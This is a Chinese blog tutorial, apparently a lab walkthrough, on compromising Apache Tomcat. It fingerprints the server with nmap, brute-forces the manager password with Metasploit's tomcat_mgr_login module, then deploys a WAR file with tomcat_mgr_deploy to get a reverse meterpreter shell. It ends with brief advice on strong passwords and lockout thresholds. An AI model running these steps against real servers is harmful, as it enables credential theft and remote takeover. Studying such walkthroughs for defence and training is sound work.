6-26漏洞利用-tomcat管理密码破解

本文介绍了如何通过Nmap探测Tomcat版本并利用Msf模块破解管理密码,进而利用Tomcat上传功能实现远程反弹shell。重点讲解了如何修改密码增强安全性及部署攻击策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述

tomcat介绍

Tomcat服务器是一个免费的开放源代码的WEB应用服务器,这里的服务器指的是中间键,类似于iis、apache,这些中间键的web容器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调式JSP程序的首选。iis是开发asp的首选,apache是开发php的首选。默认情况下,8180端口是tomcat管理的HTTP的端口

在这里插入图片描述

点击tomcat manager

在这里插入图片描述

会让我们输入对应的账号密码,输出或者点取消,会返回401,表示我们未认证

探测目标tomcat

使用nmap -sV -p 8180 IP地址 探测目标tomcat版本信息

nmap -sV -p 8180 192.168.1.105

在这里插入图片描述

现在我们已经知道版本,而且管理界面需要输入对应的用户名密码登录

msf破解tomcat密码

msf下的auxiliary/scanner/http/tomcat_mgr_login模块来对tomcat管理登录密码进行破解

在这里插入图片描述

msfconsole
use auxiliary/scanner/http/tomcat_mgr_login
show options

在这里插入图片描述

set rhosts 192.168.42.137
set rport 8180
run

在这里插入图片描述

当我们得知密码的时候,我们可以进行登录验证

在这里插入图片描述

发现可以上传war文件

msf利用tomcat管理

在msf下可以使用use multi/http/tomcat_mgr_deploy模块利用tomcat upload功能反弹shell。

它的原理是上传一个war文件,在war文件执行对应的脚本,执行payload的内容,这个时候,就会执行反弹

在这里插入图片描述

use exploit/multi/http/tomcat_mgr_deploy
show options

在这里插入图片描述

set rhosts 192.168.42.137
set rport 8180
run

在这里插入图片描述

我们管理tomcat上传deploy的war文件,并反弹回meterpreter,这就是反弹shell的原理

修改tomcat密码,为一个复杂的密码,使得不太容易被破解,以及设置对应的阈值

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值